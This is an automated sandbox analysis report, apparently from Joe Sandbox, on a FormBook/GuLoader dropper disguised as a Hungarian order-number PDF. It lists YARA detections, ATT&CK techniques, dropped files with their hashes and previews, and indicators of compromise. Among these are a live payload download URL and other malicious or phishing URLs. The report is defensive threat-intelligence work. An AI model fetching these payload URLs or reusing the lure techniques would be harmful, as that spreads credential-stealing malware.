            Source: Yara matchFile source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968622258.0000000033880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Masquerading            		OS Credential Dumping221
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts112
            Process Injection            		1
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Clipboard Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		1
            Access Token Manipulation            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		112
            Process Injection            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets23
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe8%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll3%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://enechado.ru.com/tk.binH0%Avira URL Cloudsafe
            http://enechado.ru.com/tk.bin100%Avira URL Cloudmalware
            http://enechado.ru.com/tk.binK0%Avira URL Cloudsafe
            http://enechado.ru.com/tk.binR0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            enechado.ru.com
            		103.83.194.50
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://enechado.ru.com/tk.binfalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                		high
                http://www.ftp.ftp://ftp.gopher.Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                  		high
                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                    		high
                    http://enechado.ru.com/tk.binRRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exefalse
                      		high
                      http://enechado.ru.com/tk.binHRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033E5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000001.2571159157.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                        		high
                        http://enechado.ru.com/tk.binKRendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        103.83.194.50
                        		enechado.ru.comUnited States
                        		132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1562190
                        Start date and time:2024-11-25 10:25:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                        renamed because original name is a hash value
                        Original Sample Name:Rendelsi szm 11-2024-pdf.bat.exe
                        Detection:MAL
                        Classification:mal84.troj.evad.winEXE@5/9@2/1
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 78%
                        • Number of executed functions: 72
                        • Number of non-executed functions: 304
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        103.83.194.50S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • enechado.ru.com/tk.bin
                        ZAM#U00d3WIENIE nr 594uzzf485-pdf.exeGet hashmaliciousGuLoaderBrowse
                        • passion4dance.ru.com/POL.bin
                        ZAM#U00d3WIENIE nr 594uzzf485-pdf.exeGet hashmaliciousGuLoaderBrowse
                        • passion4dance.ru.com/POL.bin
                        CONTRACT-pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • passion4dance.ru.com/qa.bin
                        WTsvUl9X8N.exeGet hashmaliciousOski Stealer, VidarBrowse
                        • 9entrevera.sa.com/o/
                        SecuriteInfo.com.Win32.SuspectCrc.30843.5697.exeGet hashmaliciousGuLoaderBrowse
                        • insula.sa.com/sgp/xkxkBkUGnvBunHoZmLt35.bin
                        doc_order_sheet_sn8577THC_13122023_pdf_0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • ytgz5.sa.com/gBuCeYv217.bin
                        awb_dhl_shipping_documents_PL&BL_13122023_pdf000000000000000000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • ytgz5.sa.com/KaIWGuoaPXGhlzSd30.bin
                        PmX1jHdUnS.exeGet hashmaliciousOski Stealer, VidarBrowse
                        • 9enternecera.ru.com/os/
                        REF#117300-100823.xlam.xlsxGet hashmaliciousUnknownBrowse
                        • sandiisells.com/.well-known/acme-challenge/cx/raf.vbs

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        enechado.ru.comS#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 103.83.194.50

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINS#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 103.83.194.50
                        https://recociese.za.com/wpcones/excel.htmlGet hashmaliciousUnknownBrowse
                        • 103.83.194.50
                        LPC Scanned Docs-Copyright #U00a9GNP.CPL.dllGet hashmaliciousAsyncRATBrowse
                        • 103.83.194.50
                        08cb9f0ed370a2daea9dc05fa08aedc2a10b1615.htmlGet hashmaliciousUnknownBrowse
                        • 103.83.194.55
                        sora.m68k.elfGet hashmaliciousMiraiBrowse
                        • 168.81.254.150
                        Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                        • 103.83.194.55
                        CARDFACTORYAccess Program, Tuesday, October 29, 2024.emlGet hashmaliciousHTMLPhisherBrowse
                        • 103.83.194.55
                        https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ==Get hashmaliciousTycoon2FABrowse
                        • 103.83.194.5
                        https://url.avanan.click/v2/r01/___https://drickly-com-dot-fluid-dreamer-410607.uc.r.appspot.com/?h=66LVKOwLflbMjYVoJBNTrXiW3CEpoRg_EafL_ygpoXil&fru;v=755/8c88*~*9&fru;w=6c5ghgij98cg/ffg&fru;E=6a766/89b55*~*9&fru;t=myyue8Fe7Ke7KBBB.lttlqj.htr.xle7Kzwqe8Kxfe8Iye7*~*jxwhe8I3ZR/bSIze7*~*xtzwhje8Ie7*~*whye8I859Oe7*~*e7*~*hie8I7/*~*Ize7*~*zfhye7*~*zwqe8Ifrue7Kxe7KfwrxywtslxyjjqBtwp.htrd.fnlzD___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo3NDhmM2FkMWRiOWU2YTNlMjE1YzgwMzRjMTliODRkZDo3OmNmNmI6NjYyMTE5OWZiNzU5MjU0NTE1ZjgzODM0ZWRlYjRmZDIwOWJmNTQ3YWUwY2MxNmU5NjFiZmExYjYzM2U0YzA0MzpoOlQ6VA#YmJyYWNleUBwcmVzaWRpby5jb20=Get hashmaliciousUnknownBrowse
                        • 103.83.194.55
                        https://url.avanan.click/v2/r01/___https://www.google.com.sg/zwq?v=7WZIz&fru;why=7WZIz&fru;xf=y&fru;jxwh=7WZIz&fru;xtzwhj=&fru;hi=7WZIz&fru;zfhy=&fru;zwq=frudxdgtqiqntsfuufwjq.htrd.n___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpkZGUwNjUwMWZkNDExNDYwNzZjMDZiMzcyYTg5ZmU1NDo3OjE4NDg6ZGQ5NzQ2M2JkZmJmZTM2MDBmOTU2MjU4MWJhNWIyZDA0ODAzMGI4MzllZGM2ZjkzYmIwZjc2YWQ5ZmQ2MDFhNTpoOlQ6VA#ZWphbWVzQGVuY2luYWNhcGl0YWwuY29tGet hashmaliciousHTMLPhisherBrowse
                        • 103.83.194.55

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dllReadouts.bat.exeGet hashmaliciousGuLoaderBrowse
                          S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            Readouts.bat.exeGet hashmaliciousGuLoaderBrowse
                              Account& Payment Transfer Details_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                Account& Payment Transfer Details_pdf.exeGet hashmaliciousGuLoaderBrowse
                                  https://updatecdn.meeting.qq.com/cos/37a67c4f1858c83dff9f22a27bb8f27d/VooVMeeting_1410000197_3.23.1.510.publish.exeGet hashmaliciousUnknownBrowse
                                    3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                      3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                        rjustificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                          rjustificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):5632
                                            Entropy (8bit):3.81704362174321
                                            Encrypted:false
                                            SSDEEP:48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
                                            MD5:3DD80DFF583544514EEB3A5ED851A519
                                            SHA1:56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
                                            SHA-256:86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
                                            SHA-512:955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                            • Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious, Browse
                                            • Filename: Readouts.bat.exe, Detection: malicious, Browse
                                            • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                            • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                            • Filename: , Detection: malicious, Browse
                                            • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                            • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                            • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                            • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                            Reputation:moderate, very likely benign file
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....oZ...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):11776
                                            Entropy (8bit):5.890541747176257
                                            Encrypted:false
                                            SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                            MD5:75ED96254FBF894E42058062B4B4F0D1
                                            SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                            SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                            SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 3%
                                            Reputation:moderate, very likely benign file
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bestandes.Sub

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):301304
                                            Entropy (8bit):7.58364346351443
                                            Encrypted:false
                                            SSDEEP:6144:q7mexgJJRFhsmjjRVL+1/cTu0dHRznByBM:SqRhsCj3+1/cTpzn
                                            MD5:629228928F5AD39C03B3725A4AEEAAF2
                                            SHA1:18BAB31B830F9C32865DFDEF458D3CF004D077B1
                                            SHA-256:8FAA952A9CBBED1B515407BA233CB1836FB7A17ED3298D2B595EE429D026AC5D
                                            SHA-512:1A26ADC3BD2C8B4E77E69676340592F112A414F7EA1F40D53D749B3ADC8403FE7721279E59C111A44560E9B682F9DACDE29E230798907459174B28910CDC95F8
                                            Malicious:false
                                            Reputation:low
                                            Preview:.......__....)....0.e..C...<...........nn.....P.{.........>.....tt................PP.............h.............................y..0000.RR...............p......................................................................................8....hh...""...k....................w.................................I...........1...X..U........n......tt.....[[.i.........................O........P........UUUUUU....>>........E............WWWW................e..................kkkk...............................V.......}}}......N.;;.....%%.K.h...............o....*........:...!.........[...##.[.....................T.X.....4.Z......./.@..$...9.............44..666........l......==....NNN...|...gg....................Z.........Y...t...........www....22............_.44........................................................................DD.. ...............AA..rrr........O...................FFF..................R..A......GGG.................=..::::.....```...\..........................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations\Dismeasured.Sup168

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):111480
                                            Entropy (8bit):2.652515826780512
                                            Encrypted:false
                                            SSDEEP:1536:gG1ys1vp+PfyxLJb5ZNT1vbdScrOL+LnHjGuI6Ig:Iub7v9VDT
                                            MD5:011FFFF988C035CCE9DD2C1387C79288
                                            SHA1:2B7FFDE1679303FCFFE49F102FE50B988F548553
                                            SHA-256:5B3465BDF005F715C27A7677BEE19E1684AE5691C84DA67E94D5FB4D00C51960
                                            SHA-512:B6E17F54F658F4BCF9867CCB6FD36C43E4EABA8F9CBE774D07F96B8F5FA9243DB4C34EA1C2A9E65F9A5B4FFD219D2638B6960F3D01DC02BA2CAAD40BD14A6C5B
                                            Malicious:false
                                            Reputation:low
                                            Preview:0020200000770000797900B6B600000000008C8C00007100A6A600F4F4F400B6B6B6000000ED00000000777777777700CE00000000C2C2006900001D1D00828200B0B0B0B000000000007E00D000000000D200DCDC000000FFFF0050000078000000400000B2B200F6F60000CA00005C000000190000000070700000000000707000BE00050000EFEF0099005E5E000000000000E70059000000002525000000000000005D0000000000575757000000676767670000000092000000B0B000F6F6F6F600FAFA0000001700009D00D00000000059000000000000B100007500FFFFFF0021210000000000C3C3C3C3004D4D00000051515100B0000000212100006B00000000000000006B00D3000000DB007D00000000000000202020003900F7F7000059595900000000200033330000000000DB0049000000000000FB00F900A2A200D200EEEEEE0000C8000000003A3A3A3A3A00004A4A00000000004F000000300000003E000F000F0F000000008A00004B000000EF008F8F8F8F00004800CD004000930000000000CF00000000003A00CFCFCF000000000000E6E600000000000000F10000000000000000F4000000006100000C00FE000000DF004C4C4C0000008D00BF0000FBFB00BCBCBC00DB0000727200420000040000070000C5C50000240000E9E900000048480066660000005A5A

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations\defencives.pol

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):455315
                                            Entropy (8bit):1.2477113828127742
                                            Encrypted:false
                                            SSDEEP:1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
                                            MD5:761F2A757CD380F71E205335CE088495
                                            SHA1:7E1C38708629925DF64A30EB0B722A7C44FA6150
                                            SHA-256:56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
                                            SHA-512:5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
                                            Malicious:false
                                            Reputation:low
                                            Preview:.5......................&.............................a....b.......................e.....................6..........H......................1.....a..J......................L.........................l...........a......................................I...............Y...................4...........................................w.............................................m.......D.......................(................................................................V........................................W.......................................................n.......D.....................................................................}....................................................................................................................z......................................:.....G..N:........................1............N.....................M.......................8.......................................................................Z......b...:...................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations\frtr.jpg

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
                                            Category:dropped
                                            Size (bytes):165466
                                            Entropy (8bit):6.5947581943238625
                                            Encrypted:false
                                            SSDEEP:3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
                                            MD5:152B2AA9B4B656DF132C2E5EAD37A7D5
                                            SHA1:9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
                                            SHA-256:11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
                                            SHA-512:4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
                                            Malicious:false
                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((.....................................................Z........................!..1.."AQ.2aq..#B...R...$3br.4Cs...%&5STc..6D...dt...7.'EUu....................................3........................1.!23AqQ."a#4..$B...R..D.............?..H..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations\lukkedagenes.fli

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):321960
                                            Entropy (8bit):1.240482616634199
                                            Encrypted:false
                                            SSDEEP:768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
                                            MD5:66087BEC9068998EE8F271F0580AB3F5
                                            SHA1:80980F5A1BD6DAF01263730273F945B031F75AE3
                                            SHA-256:248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
                                            SHA-512:046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
                                            Malicious:false
                                            Preview:...............................................................S...................................d...........................c........kY....................................................b..........~..f..............o.....................i...........................................................................................z...N...............b..............................@........................ ................;.............../..............$..........J....................I..~.......................................u........................................................................................................................+E.....................u.............j...................................a........................".................6.....4.....................................................................................................z.................P........................................................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations\opisthocomine.nit

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):263192
                                            Entropy (8bit):1.2599632446975992
                                            Encrypted:false
                                            SSDEEP:768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
                                            MD5:0EDAE6068FC853ECD4597C0C717729E8
                                            SHA1:8F02F7B5B9524451D3E2FA336B898883E8707FEA
                                            SHA-256:FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
                                            SHA-512:EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
                                            Malicious:false
                                            Preview:........................................................................................................................a......................f.........iU........................n..................................!................................X..................F......M...............................................7.....................l................@.........G..............I...........................................................................4..............I.............................................................................-....$......................^................................................................................................q...............s............................./........................................g...J....}.......j..........................gs.......................................L......H...........~.................L............E.........(................................................O.......................................

                                            C:\Windows\Resources\0809\mysterist.ini

                                            Download File
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):38
                                            Entropy (8bit):4.006841738213845
                                            Encrypted:false
                                            SSDEEP:3:kQMicv7Wz+v:clvSz+v
                                            MD5:8674B487F44FE91156094E810B1A3128
                                            SHA1:27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
                                            SHA-256:4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
                                            SHA-512:4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
                                            Malicious:false
                                            Preview:[parsimoniously]..Vesigia=unassessed..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.1934337920909615
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File size:992'543 bytes
                                            MD5:f669eaf2b985a35f3b1bf21d73b7caf2
                                            SHA1:e789d818889992fae7365386a24539a4b3bf2765
